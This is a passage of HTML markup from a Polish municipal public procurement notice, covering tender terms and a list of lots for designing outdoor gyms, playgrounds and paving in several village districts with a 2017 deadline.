            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiana postanowień umowy może być dokonana tylko w sytuacji, gdy konieczność wprowadzenia takich zmian wyniknie w rezultacie zdarzeń, których w chwili zawarcia umowy nie można było przewidzieć, którym nie można było zapobiec, ani którym nie można przeciwdziałać, a które uniemożliwiają Wykonawcy wykonanie w części lub w całości jego zadania. Dotyczy to w szczególności:
- zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,
- wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy,
- niezależnych od stron umowy zmian organizacyjnych dotyczących osób kluczowych dla realizacji umowy (w szczególności choroby, wypadku losowego, nieprzewidzianej zmiany organizacyjnej),
- przedłużającego się postępowania o uzyskanie uzgodnień branżowych
Przyjmuje się zasadę, że zmiana umowy w zakresie terminu musi wynikać z czynników obiektywnych, których Wykonawca nie mógł przewidzieć przyjmując ogólnie istnienie niezbędnych, zgodnych ze stanem faktycznym dokumentów i tryb ich obiegu, jak również kompletność materiałów wyjściowych i czas niezbędny na uzgodnienia z właściwymi instytucjami wraz z czynnościami administracyjnymi uprawnionych organów.
Zmiana postanowień umowy z uwagi na wystąpienie powyższych lub innych okoliczności niezależnych od Wykonawcy, może nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego. Termin może ulec przedłużeniu o czas trwania tych okoliczności. Umotywowany wniosek wykonawcy o zmianę treści umowy w zakresie określonym niniejszym paragrafem winien być zgłoszony Zamawiającemu co najmniej 7 dni przed upływem terminu wykonania przedmiotu umowy.
Zmiany do umowy nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Prawa zamówień publicznych.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>1.	Siłownia zewnętrzna w sołectwie Wisła Wielka usytuowana  na działce 1174/27.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie:
a) Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  orbitrek + biegacz  1 kpl.                     
b)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  wioślarz + jeździec  1 kpl.               
c)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)Dostawa i montaż 
ławka antywandalowa                                                                 4 kpl.                                                             
g)Dostawa i montaż kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)Dostawa i montaż  regulamin                                                                                       1 szt.                                                                                           
i)Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Siłownia zewnętrzna w sołectwie Czarków usytuowana  na działce 251/20. 3.	Siłownia zewnętrzna w sołectwie  Wisła Mała usytuowana  na działce 1042/103, 1043/103.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac dla każdej siłowni zewnętrznej obejmuje zaprojektowanie:
a) Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)Dostawa i montaż urządzenia do rekreacji
urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)Dostawa i montaż 
ławka antywandalowa                                                                 4 kpl.                                                             
g)Dostawa i montaż 
kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)Dostawa i montaż 
regulamin                                                                                       1 szt.                                                                                           
i)Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>3.	Siłownia zewnętrzna w sołectwie  Wisła Mała usytuowana  na działce 1042/103, 1043/103<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac  obejmuje zaprojektowanie:
a)  Dostawa i montaż urządzenia do rekreacji
  urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b)Dostawa i montaż urządzenia do rekreacji
urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)Dostawa i montaż ławka antywandalowa                                                                 4 kpl.                                                             
g)Dostawa i montaż kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)Dostawa i montaż regulamin                                                                                       1 szt.                                                                                           
i)Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>4.	Siłownia zewnętrzna w sołectwie Piasek usytuowana  na działce 4481/145<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac  obejmuje zaprojektowanie:
a) Dostawa i montaż urządzenia do rekreacji
  urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b) Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)Dostawa i montaż urządzenia do rekreacji
  urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d) Dostawa i montaż urządzenia do rekreacji
  urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)Dostawa i montaż urządzenia do rekreacji
 urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)Dostawa i montaż ławka antywandalowa                                                                 4 kpl.                                                             
g)Dostawa i montaż kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)Dostawa i montaż regulamin                                                                                       1 szt.                                                                                           
i)Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>5.	Siłownia zewnętrzna w sołectwie Studzienice usytuowana  na działce 1513/46.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie:

a)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)	Dostawa i montaż 
ławka antywandalowa                                                                 4 kpl.                                                             
g)	Dostawa i montaż 
kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)	Dostawa i montaż 
regulamin                                                                                       1 szt.                                                                                           
i)	Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>6.	Siłownia zewnętrzna w sołectwie Poręba usytuowana  na działce 215/12.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac  obejmuje zaprojektowanie:

a)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)	Dostawa i montaż 
ławka antywandalowa                                                                 4 kpl.                                                             
g)	Dostawa i montaż 
kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)	Dostawa i montaż 
regulamin                                                                                       1 szt.                                                                                           
i)	Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>7.	Siłownia zewnętrzna w sołectwie Brzeźce usytuowana  na działce 638/74<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac  obejmuje zaprojektowanie:

a)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  orbitrek + biegacz           1 kpl.                     
b)   Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  wioślarz + jeździec          1 kpl.               
c)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  prasa nóg + wahadło      1 kpl.           
d)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  stoper + twister             1 kpl.             
e)	Dostawa i montaż urządzenia do rekreacji
       urządzenie siłowni zewnętrznej  narty + podciąg nóg       1 kpl.             
f)	Dostawa i montaż 
ławka antywandalowa                                                                 4 kpl.                                                             
g)	Dostawa i montaż 
kosz na śmieci z daszkiem uchylany                                        2 kpl.                                             
h)	Dostawa i montaż 
regulamin                                                                                       1 szt.                                                                                           
i)	Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie proektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>8.	Plac zabaw i siłownia zewnętrzna w sołectwie Rudołtowice na działce 205/25. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie: 
      a)  Dostawa i montaż zestawu zabawowego                                   1 kpl. 
   b)  Dostawa i montaż huśtawka podwójna, huśtawka ważka, bujak ważka, karuzela ,  
         ścianka wspinaczkowa, stonoga, zjazd linowy                         1 kpl.
c)  Dostawa i montaż urządzenia do rekreacji
      urządzenie siłowni zewnętrznej  wahadło + biegacz           1 kpl.                     
d)  Dostawa i montaż urządzenia do rekreacji
      urządzenie siłowni zewnętrznej  wyciąg dolny + górny      1 kpl.   
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Dowiadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>9.	Wymiana nawierzchni wokół Serca Wsi w sołectwie Łąka na działce 1850/26<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie: 
 -  Wykonanie  nawierzchni z kostki betonowej o powierzchni ok. 200 m wraz                      z obrzeżem. 
	Zabudowa czterech słupów oświetleniowych terenu rekreacyjnego na działce nr 1850/6 (zasilanie Serca wsi)
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>10.	Wyposażenie boiska szkolnego w elementy ćwiczeniowe oraz elementy placu zabaw  w sołectwie Jankowice na działce 1096/23 i 1719/23. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie: 
    a) Dostawa i montaż  bramka dla dzieci starszych                   2 kpl.
    b) Dostawa i montaż  bramka dla dzieci najmłodszych           2 kpl.
    c) Dostawa i montaż  gąsienica sprawnościowa                        1 kpl.
    d) Dostawa i montaż  street workout                                           1 kpl.
    e) Bezpieczne podłoże pod poz. a,  b, c, d
    f)  Dostawa i montaż szatni kontenerowej K1                               1 szt. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
